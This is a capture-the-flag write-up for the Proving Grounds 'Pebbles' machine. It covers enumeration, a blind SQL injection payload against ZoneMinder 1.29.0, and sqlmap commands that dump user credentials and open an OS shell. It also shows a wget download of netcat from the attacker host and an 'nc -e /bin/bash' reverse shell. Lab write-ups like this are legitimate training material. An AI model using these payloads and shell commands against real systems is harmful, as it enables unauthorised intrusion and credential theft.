Pebbles
Writeup for Pebbles from Offensive Security Proving Grounds (PG)
Information Gathering
Service Enumeration
nmapAutomator.sh -H 192.168.85.52 -t fullnmapAutomator.sh -H 192.168.85.52 -t vulns
HTTP
Port 80
gobuster dir -u http://192.168.85.52 -w /usr/share/dirb/wordlists/common.txt -k -x .txt,.php --threads 50
Using a larger wordlist:
gobuster dir -u http://192.168.85.52 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -k -x .txt,.php --threads 100
We have a ZoneMinder console (v1.29.0).
Port 8080 contains another HTTP service.
gobuster dir -u http://192.168.85.52:8080 -w /usr/share/dirb/wordlists/common.txt -k -x .txt,.php --threads 50
There is a
hello.php.
Exploitation
From the ZoneMinder version (v1.29.0) above, we find that it is vulnerable to SQL injection.
It appears that the
limit parameter is vulnerable to stacked queries. Using the following POST payload:view=request&request=log&task=query&limit=100;SELECT SLEEP(5)#&minTime=5We can make the server sleep for 5 seconds.
This is a blind SQL injection (True = sleep, False = no sleep).
We can automate the blind SQL injection using
sqlmap.sqlmap http://192.168.133.52/zm/index.php --data="view=request&request=log&task=query&limit=100&minTime=5" -D zm --tables --threads 5
sqlmap http://192.168.133.52/zm/index.php --data="view=request&request=log&task=query&limit=100&minTime=5" -D zm -T Users -C Username,Password --dump --threads 5
We can achieve RCE using the
--os-shell option.sqlmap http://192.168.133.52/zm/index.php --data="view=request&request=log&task=query&limit=100&minTime=5" --os-shell
1
wget "http://192.168.49.133/nc" -O /tmp/nc
2
chmod +x /tmp/nc
3
/tmp/nc -e /bin/bash 192.168.49.133 3305
Copied!
Two things were important here: the port 3305, and the location of the nc binary.
On our listening machine, we get a root shell.
Upgrade to an interactive shell:
python -c 'import pty;pty.spawn("/bin/bash")'Proof:
Last modified 1yr ago
Copy link